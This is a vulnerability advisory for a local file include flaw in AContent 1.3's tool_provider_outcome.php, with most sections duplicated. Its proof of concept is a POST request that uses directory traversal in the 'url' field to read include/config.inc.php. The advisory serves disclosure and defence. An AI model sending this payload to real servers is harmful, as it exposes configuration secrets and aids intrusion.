AContent 'tool_provider_outcome.php' Local File Include Vulnerability
BID:58659
Info
AContent 'tool_provider_outcome.php' Local File Include Vulnerability
| Bugtraq ID: | 58659 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 23 2013 12:00AM |
| Updated: | Mar 23 2013 12:00AM |
| Credit: | DaOne |
| Vulnerable: |
Greg Gay AContent 1.3 |
| Not Vulnerable: | |
Discussion
AContent 'tool_provider_outcome.php' Local File Include Vulnerability
AContent is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks.
AContent 1.3 is vulnerable; other versions may also be affected.
AContent is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks.
AContent 1.3 is vulnerable; other versions may also be affected.
Exploit / POC
AContent 'tool_provider_outcome.php' Local File Include Vulnerability
An attacker can exploit the issue with a browser
The following example POST data is available:
POST http://www.example.com/AContent/oauth/lti/common/tool_provider_outcome.php HTTP /1.1
grade=1&key=1&secret=secret&sourcedid=1&submit=Send%20Grade&url=../../../include/config.inc.php
An attacker can exploit the issue with a browser
The following example POST data is available:
POST http://www.example.com/AContent/oauth/lti/common/tool_provider_outcome.php HTTP /1.1
grade=1&key=1&secret=secret&sourcedid=1&submit=Send%20Grade&url=../../../include/config.inc.php
Solution / Fix
AContent 'tool_provider_outcome.php' Local File Include Vulnerability
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
References
AContent 'tool_provider_outcome.php' Local File Include Vulnerability
References:
References:
- AContent Product Page (atutor.com)
- AContent Project Page (SourceForge)